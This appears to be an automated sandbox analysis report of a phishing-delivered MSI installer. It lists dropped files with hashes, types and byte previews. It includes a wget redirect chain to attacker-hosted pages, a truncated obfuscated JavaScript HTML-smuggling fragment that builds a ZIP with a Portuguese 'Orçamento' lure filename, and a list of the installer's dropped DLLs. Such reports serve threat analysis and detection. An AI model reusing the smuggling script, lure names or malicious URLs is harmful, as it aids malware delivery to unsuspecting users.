                                                                  Preview:...@IXOS.@.....@0H.V.@.....@.....@.....@.....@.....@......&.{8E2BF2CB-E645-4BA3-97BC-DCFBA1A1F5A4}..PONTUAIS.LPR..M. .C.o.n.t.r.a.t.o. .U.K.....m.s.i..@.....@.....@.....@........&.{A87EF50E-3A28-4D4C-B48A-303CB4E8A206}.....@.....@.....@.....@.......@.....@.....@.......@......PONTUAIS.LPR......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{5CFC1B52-790D-4E7B-820A-AE59F8D84600}&.{8E2BF2CB-E645-4BA3-97BC-DCFBA1A1F5A4}.@......&.{A25C57E5-4B3C-4AF9-985E-06C18ED1FBDF}&.{8E2BF2CB-E645-4BA3-97BC-DCFBA1A1F5A4}.@......&.{CBE6D541-C45C-49FA-B523-C2EBC6C9F1FD}&.{8E2BF2CB-E645-4BA3-97BC-DCFBA1A1F5A4}.@........CreateFolders..Creating folders..Folder: [1]#.9.C:\Users\user\AppData\Roaming\PONTUAIS.LPR\PONTUAIS.LPR\.@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@....<.Software\PONTUAIS.LPR\{8E2BF2CB-E645-4BA3-97BC-DCFBA1A1F5A4}...@....(.&...AI_IA_ENABLE..1$..
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):541184
                                                                  Entropy (8bit):4.801843571739515
                                                                  Encrypted:false
                                                                  SSDEEP:6144:NQqqqX4CAmjqqqXP8zv3NFAcXZoZNUa5z6HVUPZOtOy+AYDLQ7:NQqqqXjjqqqXP8LLATCldoy+
                                                                  MD5:DBF22A3E828A8797B8F4D3E6DF72B695
                                                                  SHA1:E8B26E163A11B6B74940A4C2026EE80814D71B8E
                                                                  SHA-256:B6D9DB6A4A931ACA5E2B9113832B937077703F10DA3195C36FF15C88706F7342
                                                                  SHA-512:0F39FA8E1A692ACDB9CB325F1EC29A5635F7D2F43212208539A8EB186015E72B4CA95A8CB20C9D9C737A10668CE3521C2C5AEF565815D398B132C0AA52572F9B
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:low
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q.Gd...........!..................... ........@.. ....................................@.........................x...(.......O.... ..p....................@..H.................................................... ............... ..H............text........ ...................... ..`.sdata..............................@....rsrc...p.... ......................@..@.reloc..`i...@...j..................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):330240
                                                                  Entropy (8bit):7.247242031805599
                                                                  Encrypted:false
                                                                  SSDEEP:6144:mv3f17Nwo7djrQNJe7a7P2BtEB2cbZblmhX:Mxt7djrQTKtc2cFpm
                                                                  MD5:29C35D09065CC6A59E2C5C88175C91ED
                                                                  SHA1:0EFD7BA30F3B35F4519A361D6225902A1E9844BB
                                                                  SHA-256:6E64122B430C6357B483C6127D01268694A982BF1A5F442BFA7276C11FDF4DC3
                                                                  SHA-512:CF6E51D5F1D1E53EE2A668093E4EFF9B5D2FF86CCFEEEE8B75B0F70F9B1AAA96BA6F56B6780B31BE0EDB5D8BD4273D72DFD41FDD2EF84623BA57E7CB89F28DC8
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.|`...............$.|........................@.......................................@... ......................................0...F..............................................................................|............................text...d{.......|..................`.P`.data...T...........................@.0..rdata..p...........................@.`@.eh_framH...........................@.0@.bss..................................`..idata..............................@.0..CRT....4...........................@.0..tls......... ......................@.0..rsrc....F...0...H..................@.0..reloc..............................@.0B................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                  Category:dropped
                                                                  Size (bytes):407844
                                                                  Entropy (8bit):7.996849500832706
                                                                  Encrypted:true
                                                                  SSDEEP:12288:84W1yKl0/C2xdoPR7rXZS8Cj0MGy8WztHc:8TyKl0/Vxdop7rTCjJ5Fc
                                                                  MD5:057D996B5FC5F269489774DB6C891EC8
                                                                  SHA1:6D2827C5DFAE7D68881767FD88BC1077495107C8
                                                                  SHA-256:50B16B94C843CC85576985DBE57EDA8E9C9F38529682DB0943EE0CC57994538D
                                                                  SHA-512:F71CF6E1DADE58BD23FA24DCBF97B69413F76086AF039178812D6D94CF18151B35B53171AA7838F9489A3A78936A0A4053149E4BFD40166CCD3777B7548DD6FF
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:PK.........d.V}.p.N....B......libpython3.8.dll.;m.#.u..Q.h..V.]iW.}..F..e`.9......e..B..>bv.;..P.....v.p.Q..qqR..b.1..1.R...RNb*..blS.J..b.cl'$T..~=.H..3._.x.F..._.~....k.....1...g.{....v...I..<.H<...g.-..V>.......[WW...GO.[?.Z^^-........h...;5...2v f..~p...+.oK..}.$....W.^fZ.=T.......Y......c#._......A.I.{.6..vR...=....c...${.. ..y..}_.q...r.......`q..v..ne..J6.p..+(h.s..Z..c4...{a.oO.u.....,.jll......c?......4...r...).G9.-..._...t....!G.D...c....1..../,...x+........c...l}c..\.[..X...M?.26q..eL...!..F.'.T..{m.J.......N.Q....=./...(.....Q...{..Y1..g.hYf.jc....ix..O<i.K{..8.M?.ic...F.h.L...1nxC8..f......m.D.q.1R.te.%."J...G..\..........`.]*.....7....@.a.#fK.u<.N>*]...z.L..r....u..|....}.^..;......Isli.......H..[/.......X.8.BR..\..'...Y.H.>...e"e......(Y.F.5Z..O....[G..........a...u..wvF..../.'....Gl0..(.....S!T:w..e..k.......^.x.L..m......V.m..aV...7.[.A........q%N|........y.._.e...g....q.9i4..(..!.h......8.MrA.....x0.4...S..G(.%
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):4.0081320258334
                                                                  Encrypted:false
                                                                  SSDEEP:3:1EyEMyvn:1BEN
                                                                  MD5:6BC190DD42A169DFA14515484427FC8E
                                                                  SHA1:B53BD614A834416E4A20292AA291A6D2FC221A5E
                                                                  SHA-256:B3395B660EB1EDB00FF91ECE4596E3ABE99FA558B149200F50AABF2CB77F5087
                                                                  SHA-512:5B7011ED628B673217695809A38A800E9C8A42CEB0C54AB6F8BC39DBA0745297A4FBD66D6B09188FCC952C08217152844DFC3ADA7CF468C3AAFCEC379C0B16B6
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:[General]..Active = true..
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):13893
                                                                  Entropy (8bit):5.385158157131199
                                                                  Encrypted:false
                                                                  SSDEEP:384:DkKkTkAkPkwk3kgkbk4akhgkukpkbkxkyk9kyk9YkfkdYknkhkakskQkDhk/kgkR:DHKv4rqxmjaGgBcyudCT2YmTuE7Xj2++
                                                                  MD5:345BFA7C298E33045D3776A6B726E826
                                                                  SHA1:C3622ACEBF340BCF5AD870C1F55A4FFAF7DA27CA
                                                                  SHA-256:08B2EDACE466813D4654E3101590266CD7F1BA6E2C72C4FFD5A1E357E2559BB3
                                                                  SHA-512:EE6222C8950380606A184732CDB3332975000B44739F33B16B1575F13224952DC269B1A424368F59CD182305F0B849D6C77EC5B43C769E5467C395D2299B6EA3
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:[Hit {CE1E20B4-CEF1-4013-9563-9E09D59DD215}]..Queue Time = 0..Hit Type = lifecycle..Life control = start..Protocol Version = 3..Application ID = 64484aa77f91fb11699f00b9..Application Version = 10.20.15.27..Client ID = 3F91DB0A98A2A5E3D41F903C39905F3D5916F439..Session ID = {D7C38DEB-BD0A-46AE-9D80-25B933330C4D}....[Hit {13F1761B-86C6-4676-8A26-42B2996638A2}]..Queue Time = 0..Hit Type = property..Label = VersionNT..Value = 1000..Protocol Version = 3..Application ID = 64484aa77f91fb11699f00b9..Application Version = 10.20.15.27..Client ID = 3F91DB0A98A2A5E3D41F903C39905F3D5916F439..Session ID = {D7C38DEB-BD0A-46AE-9D80-25B933330C4D}....[Hit {603B4E07-28B1-46E5-B79A-0239ECDD8138}]..Queue Time = 0..Hit Type = property..Label = VersionNT64..Value = 1000..Protocol Version = 3..Application ID = 64484aa77f91fb11699f00b9..Application Version = 10.20.15.27..Client ID = 3F91DB0A98A2A5E3D41F903C39905F3D5916F439..Session ID = {D7C38DEB-BD0A-46AE-9D80-25B933330C4D}....[Hit {AF56DAE6-49D6-4916-A115-3F6
                                                                  Process:C:\Windows\SysWOW64\7za.exe
                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {A87EF50E-3A28-4D4C-B48A-303CB4E8A206}, Number of Words: 10, Subject: PONTUAIS.LPR, Author: PONTUAIS.LPR, Name of Creating Application: Advanced Installer 18.3 build e2a0201b, Template: ;1033, Comments: PONTUAIS.LPR23334, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                  Category:dropped
                                                                  Size (bytes):3633152
                                                                  Entropy (8bit):6.61898108021782
                                                                  Encrypted:false
                                                                  SSDEEP:49152:UGDxGSFVtaNXA6K8tKk5ojmrhCMz5vk3ukDln/hFRFNUEekBVWsRkn4frUMXjDt6:BxMXAWKknz5vquZsRe4frUMXjMY
                                                                  MD5:98451DEFED5C115E437D695DA5CBBA42
                                                                  SHA1:D23D3EB7F18245FCACE9EA50D0BD64EDDBCE6ADD
                                                                  SHA-256:11C63D662DB77030B4B2A20DD92EE5907C9CAD111E4F1463133FE20F1C980AC7
                                                                  SHA-512:518B976CA0181BD8670C7364FBB06A2D36B16CE3E3929A5F12F4E5980E6121359A9FB1715CF8C93B4C6BE92BD9370CDACC49DBF7B514D9632FEFD203857590C1
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:......................>...................8...................................................................................................................I...J...K...L...M...N...O...P...Q...R...S...T...........................................................................................w...................................................................................................................................................................................................................................b...............%...7........................................................................................... ...!..."...#...$.../...0...'...(...)...*...+...,...-...........1...5...2...3...4...8...6...?...B...9...:...;...<...=...>...Q...@...A...G...C...D...E...F...o...H...a...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`.......c...t...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...u.......v...w...x...y...z...
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3015168
                                                                  Entropy (8bit):6.488798060334229
                                                                  Encrypted:false
                                                                  SSDEEP:49152:sS4Q3T9DntJVJZy+PDGffBlj+mBLZESa9cxpy4AiE6CxdNnstH/9hGwQn+rV:x4QpDnDVJZySGfX1uSa9y9evdNnstH/n
                                                                  MD5:2BED2F1B8B7975B5F317813B9D2DC150
                                                                  SHA1:DC9C89E36F2BC4E01907E0CE698881BB267EAE34
                                                                  SHA-256:A1804D8C5127E13C27F664CDD3427C185FAE6ED2AB36108B501859C670F328BD
                                                                  SHA-512:49FFB70F169198F1F60C5AB6B15AA535D6905988623DF875A976D3A0ABD5E5EA1F09969B26F50F2E6C56DFC5624BAD84E73CB4238FC9F94B9E252775C691B3EE
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g....l..l..l.~....l..bo..l..bm..l..bi..l..m.I.l..bh..l..bl..l..bb...l..b...l..bn..l.Rich..l.................PE..L.................!......*.........P.........*....c.........................`............@A..........................).K&....*...... +...................... -..=...:..T....................N.......#................*......e)......................text.....).......)................. ..`.wpp_sf.:.....).......)............. ..`.data...@4....*.......*.............@....idata..|/....*..0....*.............@..@.didat..H.....+.......*.............@....rsrc........ +.......*.............@..@.reloc...=... -..>....,.............@..B................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1299560
                                                                  Entropy (8bit):6.717180055414863
                                                                  Encrypted:false
                                                                  SSDEEP:24576:MhGigXBH4snfDLhfxTdLXWVjpUVAs7ImLKrVA16yiLo+aegfNoZFag9WM1KOn:AGigXBHvfD1f3Li9UVlerVWhNcag97sY
                                                                  MD5:84A28C3CF7B811847D74CE68C894FBA0
                                                                  SHA1:3140559C1BF1FF76A481C2E264808B3D094008FE
                                                                  SHA-256:A95C72F5B9FB9274AC9DAF554B24300E32C5E300AC92B6CE5EC8DB11F5745104
                                                                  SHA-512:E1DED6FBA8FC17DAECF97E5B0004FF6064D4403E3B02086CFCB3A2F04C36E7617D96DE9CC993B12AA00B64613BC766E985CEE25F818AC214196B8D16A2BCC2B2
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Wh..9;..9;..9;...;..9;..::.9;..=:.9;..8:..9;..<:..9;..8;..9;..7:..9;..9:..9;...;..9;..;:..9;Rich..9;................PE..L..................!.....|...h............................................... ............@A........................ ........#.. ....`..................hN...P......`...T...................DV.......S............... ...............................text...)|.......~.................. ..`.text_hf............................ ..`.data...........(..................@....idata..V.... ... ..................@..@.didat..<....@......................@....DDIData.....P......................@....rsrc........`......................@..@.reloc.......P......................@..B........................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\unarchiver.exe
                                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1646
                                                                  Entropy (8bit):5.223691407958121
                                                                  Encrypted:false
                                                                  SSDEEP:48:7xQ0/G3Gb3G3GpdGvWG3GpXxdGbBG6xdGPG8G3GKG3GpGlRv0K:NRuDuV
                                                                  MD5:F0C07CB6002728D84280115D79543856
                                                                  SHA1:94D284A5A2297E39C6B2DD65E6968E4C8FB904FE
                                                                  SHA-256:68554B6DC81DD9870174FF4DE2F77F908FAC3C321F5616EE078161110490205C
                                                                  SHA-512:175F909343D75333A89440AD928366782178F624CA2B42F8D01C899516CE6A4FBAB49438171121CFB84DC70963D94D7A8C5B31439E840ECDBDA59468919C09EA
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:04/26/2023 9:00 AM: Unpack: C:\Users\user\Downloads\Or.amento - Pedido segunda-feira, 24 de abril de 2023F1nKhTNeGq3kSwMtzuiK.zip..04/26/2023 9:00 AM: Tmp dir: C:\Users\user\AppData\Local\Temp\mzgml0ot.pkx..04/26/2023 9:00 AM: Received from standard out: ..04/26/2023 9:00 AM: Received from standard out: 7-Zip 18.05 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2018-04-30..04/26/2023 9:00 AM: Received from standard out: ..04/26/2023 9:00 AM: Received from standard out: Scanning the drive for archives:..04/26/2023 9:00 AM: Received from standard out: 1 file, 1345672 bytes (1315 KiB)..04/26/2023 9:00 AM: Received from standard out: ..04/26/2023 9:00 AM: Received from standard out: Extracting archive: C:\Users\user\Downloads\Or.amento - Pedido segunda-feira, 24 de abril de 2023F1nKhTNeGq3kSwMtzuiK.zip..04/26/2023 9:00 AM: Received from standard out: --..04/26/2023 9:00 AM: Received from standard out: Path = C:\Users\user\Downloads\Or.amento - Pedido segunda-feira, 24 de abril de 2
                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                  Category:dropped
                                                                  Size (bytes):6656
                                                                  Entropy (8bit):4.234556881661197
                                                                  Encrypted:false
                                                                  SSDEEP:48:r+sPDyh4ZzJqlYXUqKquMOuXEOqulG1jBw3qupf2TDE8wWRtiadRXOmiPJAtJpkq:ZGmSM3O5qGdKV2TDEHW/JdRXOHPJZB6
                                                                  MD5:00320BF8466B803D6B8ED96BBD9ED7DC
                                                                  SHA1:C1ECD4E9C5FBE2335D6D34BDAB673EC1A30E90ED
                                                                  SHA-256:3C31D2F2F6D0384195CE69060FEAE0EE41E865C2FE4874AC10DE11CD5F8D829F
                                                                  SHA-512:D7C939D54C7EBDA54C55135757E957ACD94D8AB07B84026F4C58D1FA7C2F898AED46F939C9500817CBD71DEB14FDDA17C8F9C7F2E22C920D8B40750A49288867
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:modified
                                                                  Size (bytes):8781
                                                                  Entropy (8bit):2.922509735804927
                                                                  Encrypted:false
                                                                  SSDEEP:48:cmZM5RGqG5GnCGVGnCGJXAE01paEyVVfmK0LBuFSIDSb7P7QkExjn8Eauy:IGqG5GCGVGCGBw+EcSMSbL7QkWbpy
                                                                  MD5:9D65366DEB47E76885D82D88396959B3
                                                                  SHA1:3B3EAB91DB3E9B02845B92F61D3B3667FD3C2CEE
                                                                  SHA-256:F40D3955E9B17ABF104BD613FF8704B2B1AB71AD967C7DDB9FFE97A18EC7B079
                                                                  SHA-512:DCC1D4661E537C78B679DA3028AF77CC64F9D031A80B62935ABCB292FA9C7191DEDF923DDB81F48EA78B47EF6A0185489D12929C7D51562C1ECBC28704423331
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:--2023-04-26 09:00:10-- https://tinyurl.com/2abosd8k..Resolving tinyurl.com (tinyurl.com)... 172.67.1.225, 104.20.139.65, 104.20.138.65..Connecting to tinyurl.com (tinyurl.com)|172.67.1.225|:443... connected...HTTP request sent, awaiting response... 301 Moved Permanently..Location: https://empresas01.page.link/V9Hh?24774833624 [following]..--2023-04-26 09:00:11-- https://empresas01.page.link/V9Hh?24774833624..Resolving empresas01.page.link (empresas01.page.link)... 172.217.168.65..Connecting to empresas01.page.link (empresas01.page.link)|172.217.168.65|:443... connected...HTTP request sent, awaiting response... 302 Found..Location: https://contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir/empresa01.html [following]..--2023-04-26 09:00:11-- https://contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir/empresa01.html..Resolving contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir (contratoempresarial.s3.ir-tbz-sh1.arvanstorage.ir)... 185.143.234.120, 185.143.233.120..Connecting to contratoem
                                                                  Process:C:\Windows\SysWOW64\wget.exe
                                                                  File Type:HTML document, ISO-8859 text, with very long lines (63358), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4910763
                                                                  Entropy (8bit):5.6607708880732694
                                                                  Encrypted:false
                                                                  SSDEEP:49152:PRg7dAX9YXoVUUgv+pZVTS33k79MjSzUBK+sMp1tJtevajlgaVHKA8/:V
                                                                  MD5:80AB72F8A28A1924AF1CBC1C8A924F1A
                                                                  SHA1:275DB94D54AD467F32FCB4259D792399CE3D7525
                                                                  SHA-256:540035F8E293D5831BE75CC9EC0606AAB0857189654F3483C2244D3939A8D8F4
                                                                  SHA-512:3070BF95CE6BB2EF451E949E14E27D0AF3DD83D2663034899E7C3D69EA1E3DECAA22A6A6431B50AFDCF1E3FCAE1727A102DE6AAE5C38C9476D8BE10AAF4DCEEF
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:<html>..<head>..<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>..<script src="https://cdnjs.cloudflare.com/ajax/libs/jszip/3.6.0/jszip.min.js"></script>..<script src="https://cdnjs.cloudflare.com/ajax/libs/jszip-utils/0.1.0/jszip-utils.min.js"></script>..<script src="https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/2.0.5/FileSaver.min.js"></script>..</head>..<body>..<P align=center>....<IMG border=0 src="https://bit.ly/3oDy7mm" width=406 align=center height=278><BR>..<IMG border=0 src="https://img001.prntscr.com/file/img001/LwwKUVJ1RTKn0DIWa1bTlw.png">..</P>..<script>..var uKIYMpEaQXWOtXaqiYETM = " ";..var UTOvJICpMqOxzWLGuykkB = rGmtIdREJlzxzvHHGSsoX("");..var sKTeTEahYyEpzYaCSwCHP = new JSZip();..var wPkHhQGQagCEymrBpWGsG = "."+"z"+"i"+"p";..var BSulApfcETdhCLOTxkxRK = "."+"m"+"s"+"i";..var EWRnpLecbzkHVbNePKKTL = "Or.amento - Pedido segunda-feira, 24 de abril de 2023"+xdavgCqNrwKbCnHdvLViT(20)+""+wPkHhQGQagCEymrBpWGsG;..var pjsYRlCNNyjuY
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                  Category:dropped
                                                                  Size (bytes):1345672
                                                                  Entropy (8bit):7.996155845666661
                                                                  Encrypted:true
                                                                  SSDEEP:24576:n6kzEX6rB+oWbBEVMUCV5PfqnGIEdCwRNGxbZPrt181/i29r3do5Sc7pfIbbks:n6KusB+onVSV5PfPdCwRabZjt181/vZr
                                                                  MD5:F883E6E983340ED0BB50C426007A7ABC
                                                                  SHA1:E53D721FEB9C2CE9A6DB5B89B0585BE88C6074C4
                                                                  SHA-256:146F0DFDB5C1FC91AC749E3044BD148E515E762256613AC31E555239915527D0
                                                                  SHA-512:23AA09A0ABC423D7BF6131066D492E4886942241909EBD307F1811F4C3F30C27086E7D3324B00BF3E8DE182D22EDEBFA85058178DEAD58FA5A97EF3975C0850C
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:PK...........VGjy.....p7.....M Contrato UK..msiup....O.LM Contrato UK..msi...x.W.....Lpw_.B....B...Y.....M....d...n..]K....B)P(.).-.wr.3....-...........s..3gl...|..o*~E..i&...R.....5....W`.AP.*55.9z,...$.aA<3.a..6L.$|.d.`2.`*.!0. .Bk.A[.C{t@GtBgtA6.'.@N.Bn.'Y..(..(..(..(..(..(.......~^Bb..b.c{..<.*..^:...#.(...........pC..;.\m....:..(....>h...D.4..6...E..-..?......@_.Vh.6h.vh..j8..........}......A.c...B0.... .F8".......#L..8...jy.p.a.Fb.Fc..?:.k'B."v.k.I.-.....gYR..ysj...'.H?oJ..=..;'..{Y...r.... ...IE.)2jcbX.(m}..."H....I..og...^..x?.?.b....*..7...]%....G..U..-{.c..{.....q.......:.SZ..=..6......j.....7~..DI...0.p.A.6....<.K.....}.I..\..)~.k..>.....2...#.<>....W.....W.........=.......r:...+..O./....1.c...T..T...?....j..7....S.1.Z.Ws.g..........W.x..W.[. }.......`....D.._...c..!.....+...;.[.......c@.._....W..[...C.c....j;-^..,Z.O.J...*...zK...]s:..]...mZ.A.:k]O..E...].t.!...H.h..........;....F....KL.:[.nR.n..[.u_...Cw...R.K......
                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
                                                                  Category:dropped
                                                                  Size (bytes):1345672
                                                                  Entropy (8bit):7.996155845666661
                                                                  Encrypted:true
                                                                  SSDEEP:24576:n6kzEX6rB+oWbBEVMUCV5PfqnGIEdCwRNGxbZPrt181/i29r3do5Sc7pfIbbks:n6KusB+onVSV5PfPdCwRabZjt181/vZr
                                                                  MD5:F883E6E983340ED0BB50C426007A7ABC
                                                                  SHA1:E53D721FEB9C2CE9A6DB5B89B0585BE88C6074C4
                                                                  SHA-256:146F0DFDB5C1FC91AC749E3044BD148E515E762256613AC31E555239915527D0
                                                                  SHA-512:23AA09A0ABC423D7BF6131066D492E4886942241909EBD307F1811F4C3F30C27086E7D3324B00BF3E8DE182D22EDEBFA85058178DEAD58FA5A97EF3975C0850C
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:PK...........VGjy.....p7.....M Contrato UK..msiup....O.LM Contrato UK..msi...x.W.....Lpw_.B....B...Y.....M....d...n..]K....B)P(.).-.wr.3....-...........s..3gl...|..o*~E..i&...R.....5....W`.AP.*55.9z,...$.aA<3.a..6L.$|.d.`2.`*.!0. .Bk.A[.C{t@GtBgtA6.'.@N.Bn.'Y..(..(..(..(..(..(.......~^Bb..b.c{..<.*..^:...#.(...........pC..;.\m....:..(....>h...D.4..6...E..-..?......@_.Vh.6h.vh..j8..........}......A.c...B0.... .F8".......#L..8...jy.p.a.Fb.Fc..?:.k'B."v.k.I.-.....gYR..ysj...'.H?oJ..=..;'..{Y...r.... ...IE.)2jcbX.(m}..."H....I..og...^..x?.?.b....*..7...]%....G..U..-{.c..{.....q.......:.SZ..=..6......j.....7~..DI...0.p.A.6....<.K.....}.I..\..)~.k..>.....2...#.<>....W.....W.........=.......r:...+..O./....1.c...T..T...?....j..7....S.1.Z.Ws.g..........W.x..W.[. }.......`....D.._...c..!.....+...;.[.......c@.._....W..[...C.c....j;-^..,Z.O.J...*...zK...]s:..]...mZ.A.:k]O..E...].t.!...H.h..........;....F....KL.:[.nR.n..[.u_...Cw...R.K......
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {A87EF50E-3A28-4D4C-B48A-303CB4E8A206}, Number of Words: 10, Subject: PONTUAIS.LPR, Author: PONTUAIS.LPR, Name of Creating Application: Advanced Installer 18.3 build e2a0201b, Template: ;1033, Comments: PONTUAIS.LPR23334, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                  Category:dropped
                                                                  Size (bytes):3633152
                                                                  Entropy (8bit):6.61898108021782
                                                                  Encrypted:false
                                                                  SSDEEP:49152:UGDxGSFVtaNXA6K8tKk5ojmrhCMz5vk3ukDln/hFRFNUEekBVWsRkn4frUMXjDt6:BxMXAWKknz5vquZsRe4frUMXjMY
                                                                  MD5:98451DEFED5C115E437D695DA5CBBA42
                                                                  SHA1:D23D3EB7F18245FCACE9EA50D0BD64EDDBCE6ADD
                                                                  SHA-256:11C63D662DB77030B4B2A20DD92EE5907C9CAD111E4F1463133FE20F1C980AC7
                                                                  SHA-512:518B976CA0181BD8670C7364FBB06A2D36B16CE3E3929A5F12F4E5980E6121359A9FB1715CF8C93B4C6BE92BD9370CDACC49DBF7B514D9632FEFD203857590C1
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview:......................>...................8...................................................................................................................I...J...K...L...M...N...O...P...Q...R...S...T...........................................................................................w...................................................................................................................................................................................................................................b...............%...7........................................................................................... ...!..."...#...$.../...0...'...(...)...*...+...,...-...........1...5...2...3...4...8...6...?...B...9...:...;...<...=...>...Q...@...A...G...C...D...E...F...o...H...a...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`.......c...t...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...u.......v...w...x...y...z...
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):780768
                                                                  Entropy (8bit):6.387720196228063
                                                                  Encrypted:false
                                                                  SSDEEP:12288:8tlNr2btWAp/wEqjh/lNKCQSZ1YVzsRiiqn6BbFAmrhymkM49+Og2Z04KHjJaI/5:8tlNrgpSZKVsRkn4frUMXjJaI/tWogPa
                                                                  MD5:573F5E653258BF622AE1C0AD118880A2
                                                                  SHA1:E243C761983908D14BAF6C7C0879301C8437415D
                                                                  SHA-256:371D1346EC9CA236B257FED5B5A5C260114E56DFF009F515FA543E11C4BB81F7
                                                                  SHA-512:DFFF15345DBF62307C3E6A4C0B363C133D1A0B8B368492F1200273407C2520B33ACB20BFF90FEAC356305990492F800844D849EE454E7124395F945DE39F39EA
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#P.Qg1..g1..g1..sZ..j1..sZ...1...E..v1...E..p1...E..51..sZ...1..sZ..f1..sZ..z1..g1..T0...E..+1...E..f1...Ex.f1..g1..e1...E..f1..Richg1..........PE..L.../.`.........."!.........B......4................................................j....@..........................;......@=...............................0......X%..p....................&.......%..@............................................text............................... ..`.rdata..............................@..@.data.......P.......@..............@....rsrc...............................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):388064
                                                                  Entropy (8bit):6.407392408414975
                                                                  Encrypted:false
